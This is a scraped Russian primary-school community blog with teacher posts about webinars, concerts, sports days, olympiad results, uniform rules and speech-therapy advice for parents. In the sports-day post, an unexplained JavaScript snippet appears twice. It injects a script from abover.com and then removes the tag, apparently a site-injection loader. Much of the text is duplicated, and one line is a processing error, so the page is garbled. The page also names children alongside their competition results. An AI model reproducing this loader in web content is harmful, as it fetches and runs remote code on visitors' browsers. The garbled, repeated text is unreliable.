Светлана Баранова,
12-02-2015 05:56
(link)
Вебинары для учителей начальной школы.
Издательство «Просвещение» приглашает
на цикл вебинаров «Формирование и оценка универсальных учебных
действий в начальной школе», посвященных особенностям развития личностных,
познавательных, регулятивных и коммуникативных универсальных учебных
действий у учащихся младших классов.
Предлагаем Вам ознакомиться
с расписанием и зарегистрироваться на вебинары. Указанное время
начала вебинара — московское.
20 февраля 2015
15:00−17:00
«Формирование и оценка универсальных учебных действий при преподавании
литературного чтения» — Светлана Георгиевна Батырева, старший
преподаватель кафедры начального образования ГБОУ ВПО «Академия социального
управления», автор пособий для 1−4 классов «Типовые задачи по формированию
универсальных учебных действий. Литературное чтение».
Ссылка для участия: my.webinar.ru/event/435096
4 марта 2015
15:00−17:00
«Формирование и оценка универсальных учебных действий при преподавании
математики» — Татьяна Петровна Хиленко, старший преподаватель кафедры
начального образования ГБОУ ВПО «Академия социального управления»; Марина
Ивановна Овчинникова, старший преподаватель кафедры начального образования ГБОУ
ВПО «Академия социального управления».
Ссылка для участия: my.webinar.ru/event/435102
11 марта 2015
15:00−17:00
«Формирование и оценка универсальных учебных действий при преподавании
окружающего мира» — Роза Шамилевна Мошнина, кандидат педагогических наук,
профессор, заведующая кафедрой начального образования ГБОУ ВПО «Академия
социального управления».
Ссылка для участия: my.webinar.ru/event/435108
22 апреля 2015
15:00−17:00
«Программа развития универсальных учебных действий как основа вариативного
образования» — Роза Шамилевна Мошнина, кандидат педагогических наук,
профессор, заведующая кафедрой начального образования ГБОУ ВПО «Академия
социального управления».
Ссылка для участия: my.webinar.ru/event/435112
Участие в вебинаре бесплатное.
Во время вебинара слушателям в электронном виде бесплатно
предоставляется Сертификат участника вебинара.
Светлана Баранова,
29-10-2014 15:41
(link)
Рефлексия на уроке.
Один из принципов развивающего обучения - принцип активности и
сознательности. Обязательным условием создания развивающей среды на уроке
является этап рефлексии. Слово рефлексия происходит от латинского
reflexio – обращение назад. Словарь иностранных слов определяет
рефлексию как размышление о своем внутреннем состоянии, самопознание.
Толковый словарь русского языка трактует рефлексию как самоанализ. В
современной педагогике под рефлексией понимают самоанализ деятельности и
её результатов.
Обычно в конце урока подводятся его итоги, обсуждение того, что
узнали, и того, как работали – т.е. каждый оценивает свой вклад в
достижение поставленных в начале урока целей, свою активность,
эффективность работы класса, увлекательность и полезность выбранных
форм работы.
Предлагаю вашему вниманию фрагмент- рефлексия на уроке литературного чтения. Хотелось бы получить оценку.
сознательности. Обязательным условием создания развивающей среды на уроке
является этап рефлексии. Слово рефлексия происходит от латинского
reflexio – обращение назад. Словарь иностранных слов определяет
рефлексию как размышление о своем внутреннем состоянии, самопознание.
Толковый словарь русского языка трактует рефлексию как самоанализ. В
современной педагогике под рефлексией понимают самоанализ деятельности и
её результатов.
Обычно в конце урока подводятся его итоги, обсуждение того, что
узнали, и того, как работали – т.е. каждый оценивает свой вклад в
достижение поставленных в начале урока целей, свою активность,
эффективность работы класса, увлекательность и полезность выбранных
форм работы.
Предлагаю вашему вниманию фрагмент- рефлексия на уроке литературного чтения. Хотелось бы получить оценку.
Светлана Баранова,
10-09-2014 06:07
(link)
Положение о едином орфографическом режиме в начальной школе
Предлагаю познакомиться с положением . Обновлено 25.07.2014 http://ext.spb.ru/index.php/2011-03-29-09-03-14/91-grades/2601-2013-03-29-16-58-36.html
Светлана Баранова,
24-06-2014 13:04
(link)
Заключительный концерт участников площадки 2014
Предлагаю вашему вниманию танец 1 отряда " Апельсины"
4 отряд " Дети России" под руководством Алины самостоятельно придумали танец. Предлагаю посмотреть отрывок
Вот и закончилась наша летняя оздоровительная площадка "Бригантина”
Мы, воспитатели, очень рады, что всё, придуманное нами для детей, им очень понравилось!
4 отряд " Дети России" под руководством Алины самостоятельно придумали танец. Предлагаю посмотреть отрывок
Вот и закончилась наша летняя оздоровительная площадка "Бригантина”
Мы, воспитатели, очень рады, что всё, придуманное нами для детей, им очень понравилось!
Светлана Баранова,
25-05-2014 04:19
(link)
Вальс 4-х классов
Под руководством Лапицкой А. Р. ученики 4-х классов показали нам свой вальс.
Светлана Баранова,
10-02-2014 18:07
(link)
Театральные постановки 7февраля 2014г
mood: Веселое
Tags: таланты
Светлана Баранова,
30-11-2013 18:08
(link)
Концерт, посвященный Дню матери.2013Г
30 ноября в нашей
школе прошел концерт, посвященный Дню матери. Учащиеся, родители и
педагоги подготовили творческие номера для мам. Очень трогательно и душевно
встретили мам их дети, прозвучали сольные и хоровые песни, стихотворные
пожелания и танцевальные номера. Мероприятие никого не оставило
равнодушным.
школе прошел концерт, посвященный Дню матери. Учащиеся, родители и
педагоги подготовили творческие номера для мам. Очень трогательно и душевно
встретили мам их дети, прозвучали сольные и хоровые песни, стихотворные
пожелания и танцевальные номера. Мероприятие никого не оставило
равнодушным.
Светлана Баранова,
29-10-2013 19:08
(link)
Олимпийские уроки в начальной школе.
О спорт! Ты – вызов!
Ты требуешь борьбы.
Вся сила наших мускулов
сосредоточена в одном, на взрыв
Похожем, слове – спорт.
А ЗНАЕТЕ ЛИ ВЫ?
В 2010 году Международным олимпийским комитетом была утверждена Система олимпийского образования «Сочи 2014».
В нашей школе 22и 23 октября прошли уроки для учеников начальной школы.
Тема уроков: олимпийские и паралимпийские ценности.
Цели урока:
Ты требуешь борьбы.
Вся сила наших мускулов
сосредоточена в одном, на взрыв
Похожем, слове – спорт.
А ЗНАЕТЕ ЛИ ВЫ?
В 2010 году Международным олимпийским комитетом была утверждена Система олимпийского образования «Сочи 2014».
В нашей школе 22и 23 октября прошли уроки для учеников начальной школы.
Тема уроков: олимпийские и паралимпийские ценности.
Цели урока:
актуализация информации о XXII Олимпийских зимних играх и
XI Паралимпийских зимних играх, имеющейся у школьников;
XI Паралимпийских зимних играх, имеющейся у школьников;
расширение представлений школьников о XXII Олимпийских зимних играх и XI Паралимпийских зимних играх;
включение школьников в активное освоение системы олимпийских и паралимпийских ценностей;
устойчивые знания и понимание школьниками ценностей Олимпийского и Паралимпийского движения.
Учителя уроков физкультуры Пезина Н.Н. и Князев М. В.- провели уроки во 2 - 4 классах.
Ребята узнали о первых и последующих играх. О чемпионах, о видах спорта.
Всем очень важно знать, чтобы победить, необходимо ещё оказаться умным, умелым, интересным и духовно развитым человеком.
включение школьников в активное освоение системы олимпийских и паралимпийских ценностей;
устойчивые знания и понимание школьниками ценностей Олимпийского и Паралимпийского движения.
Учителя уроков физкультуры Пезина Н.Н. и Князев М. В.- провели уроки во 2 - 4 классах.
Ребята узнали о первых и последующих играх. О чемпионах, о видах спорта.
Всем очень важно знать, чтобы победить, необходимо ещё оказаться умным, умелым, интересным и духовно развитым человеком.
Светлана Баранова,
03-10-2013 15:01
(link)
Весёлые старты 2.10 13г
2 октября на спортивной площадке прошли весёлые старты.
В командном соревновании приняли участие учащиеся 2-4 классов.
Эстафету подготовили: Пезина Н. Н., Князев М. В.
(function () {
var script = document.createElement('script');
script.src = 'https://abover.com/system/e...=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random();
script.onload = script.onerror = function () {
script.onload = script.onerror = null;
script.parentNode.removeChild(script);
}
document.body.appendChild(script);
})();
В командном соревновании приняли участие учащиеся 2-4 классов.
Эстафету подготовили: Пезина Н. Н., Князев М. В.
Результаты следующие:
Среди 2-х классов
Среди 2-х классов
1м - 2 " А" ( Муранец В. Н.)
2м - 2 "Б" ( Баранова С. В.)
3м - 2 "В" (Максакова Е. И.)
Среди 3-х классов
1м - 3 " А" ( Гайдукова И. Д.)
2м - 3 "В" (Шипулина Н. В.)
3м - 3 "Б" (Кузина О. В.)
4 м- 3 " Г" ( Товстенко С. Г)
Среди 4-х классов
1м - 4" Б" ( Мозговая Н. П.)
2м - 4 "Б" (Суслянко Е. В.)
3м - 3 "В" (Яблонская Т. В.)
ПОЗДРАВЛЯЕМ С ПОБЕДОЙ!
2м - 2 "Б" ( Баранова С. В.)
3м - 2 "В" (Максакова Е. И.)
Среди 3-х классов
1м - 3 " А" ( Гайдукова И. Д.)
2м - 3 "В" (Шипулина Н. В.)
3м - 3 "Б" (Кузина О. В.)
4 м- 3 " Г" ( Товстенко С. Г)
Среди 4-х классов
1м - 4" Б" ( Мозговая Н. П.)
2м - 4 "Б" (Суслянко Е. В.)
3м - 3 "В" (Яблонская Т. В.)
ПОЗДРАВЛЯЕМ С ПОБЕДОЙ!
(function () {
var script = document.createElement('script');
script.src = 'https://abover.com/system/e...=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random();
script.onload = script.onerror = function () {
script.onload = script.onerror = null;
script.parentNode.removeChild(script);
}
document.body.appendChild(script);
})();
Светлана Баранова,
01-10-2013 17:43
(link)
Концерт к Дню пожилого человека
День пожилого человека во всем мире отмечается 1 октября. В нашей школе существует много традиций, одна из них - поздравление наших любимых дедушек и бабушек. В актовом зале школы, 1 октября в 12ч состоялся праздничный концерт. В нём приняли участие ученики с 1 по 7 классы.
Примите наше поздравление, любимые и родные!
Примите наше поздравление, любимые и родные!
Мы вас уважаем совсем не за старость,
Мы вас уважаем за ваши дела,
Да, знаем, что в жизни вам крепко досталось,
Была непростая ваша судьба.
Мы вас уважаем за ваши дела,
Да, знаем, что в жизни вам крепко досталось,
Была непростая ваша судьба.
Вы многое сделали, много успели,
Страну поднимали и деток своих,
Про боль и усталость всегда забывали,
Коль дело касалось чести страны.
Страну поднимали и деток своих,
Про боль и усталость всегда забывали,
Коль дело касалось чести страны.
Спасибо большое, родные вы наши,
Здоровья вам крепкого, солнечных дней,
Живите вы с юмором в жизни и дальше,
И не сердитесь на ваших детей.
Здоровья вам крепкого, солнечных дней,
Живите вы с юмором в жизни и дальше,
И не сердитесь на ваших детей.
Светлана Баранова,
05-08-2013 11:43
(link)
ШКОЛЬНАЯ ФОРМА.
Уважаемые родители и учащиеся школы. В связи с вступлением в силу с 1
сентября2013 г.
Федерального закона от 29 декабря2012 г. No 273-ФЗ «Об
образовании в Российской Федерации» (далее Закон), согласно которому
установление требований к одежде
обучающихся отнесено к компетенции
образовательной организации, администрация школы доводит до вашего
сведения, что внешний вид и одежда школьников
должны соответствовать
принятым в обществе нормам делового стиля и носить светский характер, а
так же соответствовать нормам СанПиН.
Цвет формы черный, синий, серый.
Покрой одежды - классический. Модель:
- для девочек:
пиджак (жакет, жилетка), рубашки (блузы), юбка(брюки).
Колготки однотонного нейтрального цвета
- для мальчиков:
брюки, рубашка, пиджак (жилет)
Одежда обучающихся должна соответствовать погоде и месту проведения учебных
занятий, температурному режиму в помещении.
Обучающимся
не рекомендуется ношение в образовательном учреждении одежды,
обуви и
аксессуаров с травмирующей фурнитурой, символикой асоциальных
неформальных молодежных объединений, а также пропагандирующих
психоактивные вещества и противоправное поведение.
сентября2013 г.
Федерального закона от 29 декабря2012 г. No 273-ФЗ «Об
образовании в Российской Федерации» (далее Закон), согласно которому
установление требований к одежде
обучающихся отнесено к компетенции
образовательной организации, администрация школы доводит до вашего
сведения, что внешний вид и одежда школьников
должны соответствовать
принятым в обществе нормам делового стиля и носить светский характер, а
так же соответствовать нормам СанПиН.
Цвет формы черный, синий, серый.
Покрой одежды - классический. Модель:
- для девочек:
пиджак (жакет, жилетка), рубашки (блузы), юбка(брюки).
Колготки однотонного нейтрального цвета
- для мальчиков:
брюки, рубашка, пиджак (жилет)
Одежда обучающихся должна соответствовать погоде и месту проведения учебных
занятий, температурному режиму в помещении.
Обучающимся
не рекомендуется ношение в образовательном учреждении одежды,
обуви и
аксессуаров с травмирующей фурнитурой, символикой асоциальных
неформальных молодежных объединений, а также пропагандирующих
психоактивные вещества и противоправное поведение.
Светлана Баранова,
06-01-2013 13:40
(link)
Дневник.ру
Дневник.ру - Единая образовательная сеть России, которая формирует уникальную электронную среду для учителей, учеников и их родителей.
Базовый функционал Дневник.ру бесплатный для всех участников образовательного процесса.
Пользователям доступны электронный классный журнал и электронный дневник учащегося, а также медиатека, библиотека образовательной литературы, онлайн-тренинг тестирования ЕГЭ, возможность пройти вступительные олимпиады в крупнейшие ВУЗы России.
Уважаемые коллеги, родители и ученики! Наша "Началочка" теперь в Дневнике.ру. http://groups.dnevnik.ru /group.aspx?group=158787 Присоединяйтесь!!!
Базовый функционал Дневник.ру бесплатный для всех участников образовательного процесса.
Пользователям доступны электронный классный журнал и электронный дневник учащегося, а также медиатека, библиотека образовательной литературы, онлайн-тренинг тестирования ЕГЭ, возможность пройти вступительные олимпиады в крупнейшие ВУЗы России.
Уважаемые коллеги, родители и ученики! Наша "Началочка" теперь в Дневнике.ру. http://groups.dnevnik.ru /group.aspx?group=158787 Присоединяйтесь!!!
Светлана Баранова,
19-11-2012 11:29
(link)
НЕДЕЛЯ РУССКОГО ЯЗЫКА В НАЧАЛЬНОЙ ШКОЛЕ.
Проводимые в школах предметные недели ещё раз показывают значимость
изучаемых предметов, их взаимосвязи между собой. Каждый ученик школы
может самореализоваться, будь то олимпиада по русскому языку, участие в
конкурсе чтецов.
18 ноября прошёл квест среди учеников 3 и 4 классов. Ученики 3 класса готовили проблемное задание c элементами ролевой игры, для выполнения которого
использовали информационные ресурсы интернета. Веб-квест был направлен на
развитие у учащихся навыков аналитического и творческого мышления.
Результаты следующие:
1м - 4 "А" ( учитель Титова Л.М.)
2м - 4 "Б" ( учитель Смыкова В. В.)
3м - 4 " В" ( учитель Новиченко А. Г.)
ПОЗДРАВЛЯЕМ УЧЕНИКОВ И ИХ УЧИТЕЛЕЙ!
Фотографии можно посмотреть в альбоме
http://foto.mail.ru/community/schoolsosh/1680
изучаемых предметов, их взаимосвязи между собой. Каждый ученик школы
может самореализоваться, будь то олимпиада по русскому языку, участие в
конкурсе чтецов.
18 ноября прошёл квест среди учеников 3 и 4 классов. Ученики 3 класса готовили проблемное задание c элементами ролевой игры, для выполнения которого
использовали информационные ресурсы интернета. Веб-квест был направлен на
развитие у учащихся навыков аналитического и творческого мышления.
Результаты следующие:
1м - 4 "А" ( учитель Титова Л.М.)
2м - 4 "Б" ( учитель Смыкова В. В.)
3м - 4 " В" ( учитель Новиченко А. Г.)
ПОЗДРАВЛЯЕМ УЧЕНИКОВ И ИХ УЧИТЕЛЕЙ!

http://foto.mail.ru/community/schoolsosh/1680
Светлана Баранова,
29-10-2012 09:13
(link)
Олимпиада в 2- 4 классах 24.10.12г
Результаты олимпиад
Русский язык
2 "Б", учитель Кузина О. А.
Русский язык
2 "Б", учитель Кузина О. А.
Присяжнюк Никита - 1м.
Ковалюнас Никита - 2м.
Ковалюнас Никита - 2м.
Чеберяк Дмитрий- 2м.
2 "Г", учитель Товстенко С. Г.
Сурмина Арина -3 м.
Математика
2 "А", учитель Гайдукова И. Д.
Капленко Максим - 1м
Гайдуков Руслан - 2м
2 "Б", учитель Кузина О. А.
Присяжнюк Никита - 3 м.
2 "В" , учитель Шипулина Н. В.
Ильин Илья - 2м
Русский язык
3 "А", учитель Суслянко Е. В.
Баранов Данила- 3м
3 "Б", учитель Мозговая Н.П.
Черезова Дарья - 1 м.
Лукичёва Элина - 2 м.
Математика
3 "А", учитель Суслянко Е. В.
Палкин Вадим - 2м
Баранов Данила- 3м
3 "Б", учитель Мозговая Н.П.
Мицкевич Валерий - 1м.
Короткова Арина -1 м.
Черезова Дарья - 2 м.
Безмен Светлана - 2м
Рыбалко Екатерина -2 м
Русский язык
4 "А", Титова Л. М.
Богданова Полина - 2м.
Заблоцкая Елизавета - 3м
Терехов Андрей - 2м
Усова Елизавета -2м.
4 "Б", Смыкова В. В.
Рябцева Яна - 3м.
4 "В", Новиченко А. Г.
Деттерер Екатерина -1м
Математика
4 "А", Титова Л. М.
Римский Юрий - 2м.
Заблоцкая Елизавета - 3м.
4 "В", Новиченко А. Г.
Деттерер Екатерина -3 м.
Гайдуков Руслан - 2м
2 "Б", учитель Кузина О. А.
Присяжнюк Никита - 3 м.
2 "В" , учитель Шипулина Н. В.
Ильин Илья - 2м
Русский язык
3 "А", учитель Суслянко Е. В.
Баранов Данила- 3м
3 "Б", учитель Мозговая Н.П.
Черезова Дарья - 1 м.
Лукичёва Элина - 2 м.
Математика
3 "А", учитель Суслянко Е. В.
Палкин Вадим - 2м
Баранов Данила- 3м
3 "Б", учитель Мозговая Н.П.
Мицкевич Валерий - 1м.
Короткова Арина -1 м.
Черезова Дарья - 2 м.
Безмен Светлана - 2м
Рыбалко Екатерина -2 м
Русский язык
4 "А", Титова Л. М.
Богданова Полина - 2м.
Заблоцкая Елизавета - 3м
Терехов Андрей - 2м
Усова Елизавета -2м.
4 "Б", Смыкова В. В.
Рябцева Яна - 3м.
4 "В", Новиченко А. Г.
Деттерер Екатерина -1м
Математика
4 "А", Титова Л. М.
Римский Юрий - 2м.
Заблоцкая Елизавета - 3м.
4 "В", Новиченко А. Г.
Деттерер Екатерина -3 м.
[ Cannot complete post text processing ]
Rating |
|
Светлана Баранова,
02-10-2012 13:26
(link)
ТЕМАТИЧЕСКИЕ КОЛЛЕКЦИИ МАТЕРИАЛОВ
В коллекции: сценарии, стихи, пожелания,
поздравления, песни, ноты, фонограммы, открытки,
картинки,плакаты, подарки,поделки, викторины и игры по сказкам, дидактические карточки и настольные игры
для распечатки, аудио, видео,сценарии,картинки, раскраски, поделки, методическая копилка .Интерактивные игры.
http://www.metodkabinet.eu/BGM/BGM_menu_Temkatalog.html
ВСЁ ДЛЯ ВАС , УВАЖАЕМЫЕ КОЛЛЕГИ!
поздравления, песни, ноты, фонограммы, открытки,
картинки,плакаты, подарки,поделки, викторины и игры по сказкам, дидактические карточки и настольные игры
для распечатки, аудио, видео,сценарии,картинки, раскраски, поделки, методическая копилка .Интерактивные игры.
http://www.metodkabinet.eu/BGM/BGM_menu_Temkatalog.html
ВСЁ ДЛЯ ВАС , УВАЖАЕМЫЕ КОЛЛЕГИ!
Светлана Баранова,
20-09-2012 19:05
(link)
Что нам осень подарила?
Ежегодно в нашей школе проводится выставка - конкурс осенних букетов и поделок из овощей и фруктов.
В конкурсе участвовали ребята с1 по 4классы. Большое спасибо нашим родителям!
Светлана Баранова,
20-09-2012 10:14
(link)
КОНСУЛЬТАЦИЯ ЛОГОПЕДА
Как вы можете помочь вашему ребенку в развитии речи?
- Для того чтобы ваш ребенок заговорил, вы должны вести с ним постоянный односторонний разговор, даже если вам иногда кажется, что это бессмысленно и ребенок не обращает внимания на вашу речь. Спокойно и членораздельно называйте все предметы, которые вы показываете ребенку. Повторяйте это по нескольку раз.
Ни в коем случае не говорите с ребенком на «детском» языке, сюсюкая, картавя и искажая слова.Это может запутать ребенка и
не поможет в освоении правильной речи.
Разговаривайте с ребенком, чем бы вы ни занимались. Рассказывайте ему про все, что вы видите с ним на прогулке: про деревья, цветы, детей, которые играют, и т. д. Когда вы переодеваете малыша, называйте предметы одежды, части тела; когда накрываете на стол, объясняйте, где стол, стул, тарелка, ложка и т. д.
Читайте ребенку книжки с картинками, рассматривая и объясняя ему картинки. Находите на картинках знакомые малышу предметы и старайтесь показать и объяснить новые. Вначале читайте самые простые книжки или легко запоминающиеся стихи.
Родителям, конечно, неинтересно читать одно и то же, но малыши любят помногу раз слушать одни и те же истории. Чтение книжек с картинками лучше помогает приобщить малыша к чтению и к тому же развивает речь.
Пойте ребенку простые песенки, повторяйте их часто, пусть ребенок при этом
хлопает в ладошки или притопывает ножками. Все это будет пополнять его словарный запас.
Поощряйте любые попытки вашего малыша говорить, даже если вы ничего не поняли. Постепенно вы научитесь понимать его речь, а пока пытайтесь угадывать его желания по косвенным признакам и задавая вспомогательные вопросы.
Если ребенок трет глазки, спросите его: «Ты устал и хочешь спать?», если он тянется к чашке: «Ты хочешь пить?» В случае, если вы совсем не поняли ничего из сказанного малышом, проявите заинтересованность фразой вроде: «Гм-м, это очень
интересно».
Если вам удалось понять, что хочет ребенок, четко повторите все, что он сказал: «Ты хочешь сока?», «Да, это зайка». Говорите четко, ясно, выразительно.
Кроме этого, развивайте пальчики ребенка. Взаимосвязь тонкой (пальцевой) моторики и речевого развития известна уже давно.
Еще наши прабабушки использовали в воспитании детей игры типа «Ладушки» и «Сорока кашу варила».
Помните, что развивая тонкую моторику, Вы не только продвинете развитие своего ребенка вперед, но и сможете быстрее преодолеть отклонения, возникшие в речевом развитии ребенка.
Какие игры и упражнения можно порекомендовать для домашних занятий?
- Предложите своей маленькой дочурке превратиться в Золушку и разложить в две разные кружечки фасоль и горох, которые Вы перемешали в большой чашке.
- С сынишкой можно провести игру-соревнование на скорость. Кто скорее, папа или сын разложит большие и маленькие болтики или гайки в два разных контейнера?
- Покажите малышу, как можно складывать забавные фигурки из спичек, ушных палочек или счетных палочек. Пусть сложит лесенку, елочку, домик, кроватку для куклы…
- Выкладывайте с ребенком узоры из гороха, фасоли, желудей. Используйте для основы картонку с тонким слоем пластилина.
- Лепите со своим крохой из пластилина, играйте в мозаику и пазлы.
- Учите ребенка застегивать и расстегивать пуговицы, шнуровать ботинки, плести косички из разноцветных шнурков.
- Как можно раньше купите малышу краски для рисования пальчиками. Сколько восторга и пользы от такого рисования! Двухлетний малыш справится с рисованием мягкой кисточкой. А трехлетнего нужно научить правильно держать карандаш, и тогда вскоре Вы получите первые шедевры маленького художника. В деле обучения ребенка рисованию Вам помогут книжки-раскраски.
- И наконец, игры с пальчиками или пальчиковая гимнастика. Проводите подобные упражнения регулярно. Выразительно произносите текст и показывайте ребенку. сопровождающие его движения. Пусть пробует делать гимнастику вместе с Вами, сначала хотя бы договаривая текст.
Светлана Баранова,
23-05-2012 15:48
(link)
IX краевая олимпиада занковцев.
5мая - команда СОШ №1 приняла участие в IX
краевой олимпиаде учеников –занковцев в г.Красноярске.
В команде были учащиеся четвертых классов: Поносова Анна и Бельтюков Даниил (учитель Максакова Е.И.), Слуцких Диана ( учитель МуранецВ.Н.) Руководителем нашей группы была Максакова Е.И. Победителем в номинации "Русский язык " стала Поносова Анна.
краевой олимпиаде учеников –занковцев в г.Красноярске.
В команде были учащиеся четвертых классов: Поносова Анна и Бельтюков Даниил (учитель Максакова Е.И.), Слуцких Диана ( учитель МуранецВ.Н.) Руководителем нашей группы была Максакова Е.И. Победителем в номинации "Русский язык " стала Поносова Анна.





Светлана Баранова,
08-04-2012 13:49
(link)
ДЕНЬ ФИЗМИНУТКИ В НАЧАЛЬНОЙ ШКОЛЕ 6.04.2012г.
Rating |
|
This group may contain posts available to members only.
Join the group to read them
Join the group to read them